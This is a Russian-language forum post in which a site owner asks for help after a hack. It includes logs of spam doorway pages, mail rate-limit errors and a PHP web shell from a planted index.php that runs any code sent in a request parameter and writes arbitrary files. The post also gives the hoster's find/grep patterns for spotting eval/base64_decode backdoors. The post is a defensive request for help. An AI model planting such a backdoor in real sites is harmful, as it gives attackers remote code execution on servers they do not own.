меня взломали
1) в логах регулярно вижу вот такие строки, хотя кредитами не занимаюсь
82.145.208.54 - - [02/Apr/2014:01:35:16 +0400] "GET /rc/v-kakom-banke-mojno-vzyat-kredit-nalichnimi-v-20-let.html HTTP/1.0" 301 295 "http://www.google.com.ua/search?q=%D0%97%D0%B0%D1%8F%D0%B2%D0%BA%D0%B0+%D0%BD%D0%B0+%D0%BA%D1%80%D0%B5%D0%B4%D0%B8%D1%82+%D0%BD%D0%B5+%D0%BE%D1%84%D0%B8%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D0%BE+%D1%80%D0%B0%D0%B1%D0%BE%D1%82%D0%B0%D1%8E%D1%89%D0%B8%D0%BC+%D0%B2+%D0%A5%D0%B5%D1%80%D1%81%D0%BE%D0%BD%D0%B5&prmd=ivns&ei=4TA7U-KOI8SSO5W8gIAP&start=60&sa=N" "Opera/9.80 (J2ME/MIDP; Opera Mini/4.5.33867/34.1654; U; ru) Presto/2.8.119 Version/11.10"
82.145.208.54 - - [02/Apr/2014:01:35:16 +0400] "GET /rc/v-kakom-banke-mojno-vzyat-kredit-nalichnimi-v-20-let.html HTTP/1.0" 404 28497 "http://www.google.com.ua/search?q=%D0%97%D0%B0%D1%8F%D0%B2%D0%BA%D0%B0+%D0%BD%D0%B0+%D0%BA%D1%80%D0%B5%D0%B4%D0%B8%D1%82+%D0%BD%D0%B5+%D0%BE%D1%84%D0%B8%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D0%BE+%D1%80%D0%B0%D0%B1%D0%BE%D1%82%D0%B0%D1%8E%D1%89%D0%B8%D0%BC+%D0%B2+%D0%A5%D0%B5%D1%80%D1%81%D0%BE%D0%BD%D0%B5&prmd=ivns&ei=4TA7U-KOI8SSO5W8gIAP&start=60&sa=N" "Opera/9.80 (J2ME/MIDP; Opera Mini/4.5.33867/34.1654; U; ru) Presto/2.8.119 Version/11.10"
82.145.208.54 - - [02/Apr/2014:01:35:17 +0400] "GET /templates/protostar/favicon.ico HTTP/1.0" 200 1406 "http://www.мойсайт.ru/rc/v-kakom-banke-mojno-vzyat-kredit-nalichnimi-v-20-let.html" "Opera/9.80 (J2ME/MIDP; Opera Mini/4.5.33867/34.1654; U; ru) Presto/2.8.119 Version/11.10"
при ручной проверке ссылки
http://www.google.com.ua/search?q=%D0%97%D0%B0%D1%8F%D0%B2%D0%BA%D0%B0+%D0%BD%D0%B0+%D0%BA%D1%80%D0%B5%D0%B4%D0%B8%D1%82+%D0%BD%D0%B5+%D0%BE%D1%84%D0%B8%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D0%BE+%D1%80%D0%B0%D0%B1%D0%BE%D1%82%D0%B0%D1%8E%D1%89%D0%B8%D0%BC+%D0%B2+%D0%A5%D0%B5%D1%80%D1%81%D0%BE%D0%BD%D0%B5&prmd=ivns&ei=4TA7U-KOI8SSO5W8gIAP&start=60&sa=Nмоего сайта в результатах не нахожу
страницы rc/v-kakom-banke-mojno-vzyat-kredit-nalichnimi-v-20-let.html на сайте у меня не существует - тоже руками проверял.
директорию rc я обнаружил на ftp почти 2 месяца назад и сразу удалил, а похожие запросы все еще появляются, хоть и реже
2) еще у меня в лог файле много почтовых ошибок с каждого домена
sendmail: warning: premature end-of-input on /usr/sbin/postdrop -r while reading input attribute name
sendmail: fatal: diann_moses@мойсайт.ru(1363): queue file write error
postdrop: fatal: uid=1363: day rate limit exceeded
sendmail: warning: premature end-of-input on /usr/sbin/postdrop -r while reading input attribute name
sendmail: fatal: diann_moses@мойсайт.ru(1363): queue file write error
postdrop: fatal: uid=1363: day rate limit exceeded
sendmail: warning: premature end-of-input on /usr/sbin/postdrop -r while reading input attribute name
sendmail: fatal: diann_moses@мойсайт.ru(1363): queue file write error
Такое ощущение, что эти гады как-то создают почтовые адреса на моем доменном имени и с них пытаются кому-то рассылать спам.
Хостер уже установил мне тестовый лимит в 30 писем в день. И как только есть превышение, то он блокирует функцию mail() и у меня перестает работать обратная связь с сайта!
3) уже удалил кучу непонятных index.php с вот таким содержанием:
$drzqg = "37bad16411b7278d563a3aab1b9e588b"; if(isset($_REQUEST['pdmlcxc'])) { $yknb = $_REQUEST['pdmlcxc']; eval($yknb); exit(); } if(isset($_REQUEST['rywtupne'])) { $jbqommpa = $_REQUEST['fdrqg']; $shndup = $_REQUEST['rywtupne']; $mnzg = fopen($shndup, 'w'); $ptlnc = fwrite($mnzg, $jbqommpa); fclose($mnzg); echo $ptlnc; exit(); }
чего этот файл хоть делает? я вообще не понимаю
многие файлы пока сохранил себе на локальный комп, чтобы разобраться что это такое (приложил архив в теме)
3) хостер посоветовал искать скрипты так через ssh (но у меня не получилось)
find -type f -name "*.php" -print0 | xargs -0 fgrep -l 'base64_decode($_POST'
find -type f -name "*.php" -print0 | xargs -0 fgrep -l 'if (count($_POST) < 2) { die(PHP_OS.chr('
find -type f -size -1000c -name "*.php" -print0 | xargs -0 grep -il "if(isset(\$_REQUEST\[.*eval(.*)"
find -type f -name "*.php" -print0 | xargs -0 fgrep -l 'base64_decode($_REQUEST'
find -type f -size -1000c -name "*.php" -print0 | xargs -0 fgrep -l "eval(stripslashes($_REQUEST"
4) я скачал утилитку far.php для текстового поиска на хостинге и удалил кучу файлов с названиями типа 7NA_YsZ6.php, содержащих eval и base64_decode
но есть ощущение, что еще не все почищено, т.к. пару раз в неделю превышается лимит по спаму
5) поменял пароль на хостинге, поменял пароль ftp, разрешил доступ по ftp только с моего домашнего IP адреса путем помещения файла ftpaccess в корень хостинга
6) на хостинге 5 сайтов
cms prestashop - 1 шт
Joomla 1.5 - 2 шт
Joomla 3 - 1 шт (включена двухфакторная аутентификация в админке через гугль приложение для андроида)
шаблон bootstrap - маленький сайт без cms
помогите, пожалуйста, понять как меня взломали, что эти скрипты делают и как их вычистить до конца!
ну и как потом защититься
31.03.2024, 16:14:32